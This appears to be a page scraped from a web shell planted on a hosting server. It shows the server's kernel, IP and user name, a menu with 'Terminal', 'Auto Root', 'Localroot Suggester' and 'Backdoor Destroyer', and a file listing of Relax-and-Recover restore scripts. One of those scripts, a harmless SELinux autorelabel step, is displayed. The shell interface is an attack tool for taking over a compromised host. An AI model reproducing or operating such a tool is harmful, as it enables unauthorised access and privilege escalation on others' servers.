Linux ih01.iridiumhosting.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.158
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
restore /
default /
Delete
Unzip
Name
Size
Permission
Date
Action
050_remount_async.sh
1.11
KB
-rw-r--r--
2026-04-01 09:39
500_selinux_autorelabel.sh
945
B
-rw-r--r--
2026-04-01 09:39
900_create_missing_directories.sh
5.29
KB
-rw-r--r--
2026-04-01 09:39
950_restore_esp.sh
350
B
-rw-r--r--
2026-04-01 09:39
990_move_away_restored_files.sh
4.27
KB
-rw-r--r--
2026-04-01 09:39
995_remount_sync.sh
1.4
KB
-rw-r--r--
2026-04-01 09:39
Save
Rename
# This file is part of Relax-and-Recover, licensed under the GNU General # Public License. Refer to the included COPYING for full text of license. # In the /usr/share/rear/conf/default.conf file the variable to temporary disasble SELinux during backup is # defined as BACKUP_SELINUX_DISABLE=1 (so, by default disable SELinux during backup/archive of our system disks). # In most case this is honored with BACKUP=NETFS setting using tar or rsync backup programs. # Skip when disabling SELinux policy during backup/restore with NETFS or RSYNC is not requested: is_true "$BACKUP_SELINUX_DISABLE" || return 0 # When BACKUP_SELINUX_DISABLE=1 has been defined we force a rebaling of all files after recovery (including reboot). # Force SELinux relabeling of all files after reboot of the recovered system: touch $TARGET_FS_ROOT/.autorelabel LogPrint "Created SELinux $TARGET_FS_ROOT/.autorelabel file : after reboot SELinux will relabel all files"